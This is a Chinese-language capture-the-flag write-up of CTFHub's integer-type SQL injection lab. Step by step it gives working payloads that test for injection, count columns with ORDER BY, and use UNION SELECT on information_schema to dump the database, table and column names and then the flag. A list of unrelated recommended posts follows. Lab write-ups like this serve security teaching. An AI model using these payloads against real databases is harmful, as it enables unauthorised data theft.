CTFHUB技能树之SQL——整数型注入

开启靶场,打开链接:

直接指明是SQL整数型注入,但还是来判断一下


(1)检查是否存在注入点

1 and 1=1#

返回正确

1 and 1=2#

返回错误

说明存在SQL整数型注入


(2)猜字段数

1 order by 2#

1 order by 3#

说明字段数是2


(3)爆数据库名

1 and 1=2 union select 1,database()#

得知数据库名是sqli


(4)爆表名

1 and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'#

显示表名是news表和flag表,其中flag表是我们需要的


(5)爆列名

1 and 1=2 union select 1,column_name from information_schema.columns where table_schema='sqli' and table_name='flag'#

得知flag表的列名是flag


(6)爆字段内容(flag)

1 and 1=2 union select 1,group_concat(flag) from sqli.flag#

成功的得到flag:

ctfhub{0bdb6d621fc76a06fde34a00}

这里用sqlmap也是可以的,但我提前交了就不想再费时间重开一遍靶场了,待会就在"字符型注入"中试试了

相关推荐
l1t7 小时前
在linux和windows中解决duckdb 1.6dev版本输出执行计划报错问题
linux·运维·数据库·windows·duckdb
执子手 吹散苍茫茫烟波7 小时前
RC 隔离级别下 MySQL InnoDB 死锁典型案例
数据库·mysql
四月天437 小时前
web安全-SSTI(服务器模板注入)
笔记·学习·web安全·网络安全
落叶-IT8 小时前
Java异常处理深度实战教程:异常传播的失败场景分析
数据库·oracle
疯狂打码的少年8 小时前
【操作系统】虚拟存储管理(局部性原理、缺页中断)
笔记
NULL指向我9 小时前
TMS320F28379D笔记5:CAN通信多邮箱配置
笔记
执子手 吹散苍茫茫烟波9 小时前
常见的数据库隔离级别以及企业里常用的是什么方案
数据库
Database_Cool_9 小时前
数据库慢查询优化首选方案:阿里云 RDS 性能洞察+自动诊断
数据库·人工智能·阿里云
YOU OU10 小时前
Redis初识
数据库·redis·缓存
长孙豪翔10 小时前
在.net中读写config文件的各种方法
java·数据库·.net